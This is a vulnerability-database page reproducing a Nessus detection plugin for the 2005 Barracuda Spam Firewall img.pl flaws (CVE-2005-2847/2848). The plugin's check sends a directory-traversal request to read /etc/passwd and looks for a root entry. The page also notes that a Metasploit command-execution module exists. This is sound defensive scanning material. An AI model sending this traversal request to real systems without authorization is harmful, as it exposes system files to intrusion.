Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2005-2021 Tenable Network Security, Inc.BARRACUDA_SPAM_FIREWALL_3118.NASL
HistorySep 01, 2005 - 12:00 a.m.

Barracuda Spam Firewall < 3.1.18 Multiple Vulnerabilities

2005-09-0100:00:00
This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.
www.tenable.com
8
JSON

The remote host appears to be a Barracuda Spam Firewall network appliance, which protects mail servers from spam, viruses, and the like.

Further, it appears that the installed appliance suffers from several vulnerabilities that allow for execution of arbitrary code and reading of arbitrary files, all subject to the permissions of the web server user id.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description) {
  script_id(19556);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2005-2847", "CVE-2005-2848");
  script_bugtraq_id(14710, 14712);
  script_xref(name:"EDB-ID", value:"1236");

  script_name(english:"Barracuda Spam Firewall < 3.1.18 Multiple Vulnerabilities");
  script_summary(english:"Attempts to access a local file via directory traversal");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be a Barracuda Spam Firewall network
appliance, which protects mail servers from spam, viruses, and the
like.

Further, it appears that the installed appliance suffers from several
vulnerabilities that allow for execution of arbitrary code and reading
of arbitrary files, all subject to the permissions of the web server
user id.");
 # http://web.archive.org/web/20051026050318/http://www.securiweb.net/wiki/Ressources/AvisDeSecurite/2005.1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e58e748c");
  script_set_attribute(attribute:"solution", value:
"Upgrade to firmware 3.1.18 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Barracuda IMG.PL Remote Command Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2005/09/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/09/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/h:barracuda_networks:barracuda_spam_firewall");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");

  script_dependencies("barracuda_detect.nasl");
  script_require_ports("Services/www", 8000);
  script_require_keys("www/barracuda_spamfw");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

port = get_http_port(default:8000, embedded:TRUE);
get_kb_item_or_exit("www/barracuda_spamfw");

# Try to exploit one of the flaws to read /etc/passwd.
r = http_send_recv3(
  method : "GET",
  port   : port,
  item   : "/cgi-bin/img.pl?" + "f=../etc/passwd",
  exit_on_fail : TRUE
);
res = r[2];

# There's a problem if there's an entry for root.
if (egrep(string:res, pattern:"root:.*:0:[01]:"))
  security_hole(port);
else audit(AUDIT_LISTEN_NOT_VULN, "Barracuda Spam Firewall" , port);
VendorProductVersionCPE
barracuda_networksbarracuda_spam_firewallcpe:/h:barracuda_networks:barracuda_spam_firewall

Related

cve 2
packetstorm 1
checkpoint_advisories 1
cve
cve
CVE-2005-2848
2005-09-08 10:03:00
CVE-2005-2847
2005-09-08 10:03:00
packetstorm
packetstorm
Barracuda IMG.PL Remote Command Execution
2009-10-30 00:00:00
checkpoint_advisories
checkpoint_advisories
Barracuda IMG.PL Command Execution - Ver2 (CVE-2005-2847)
2014-03-03 00:00:00
JSON
Related for BARRACUDA_SPAM_FIREWALL_3118.NASL
cve2packetstorm1checkpoint_advisories1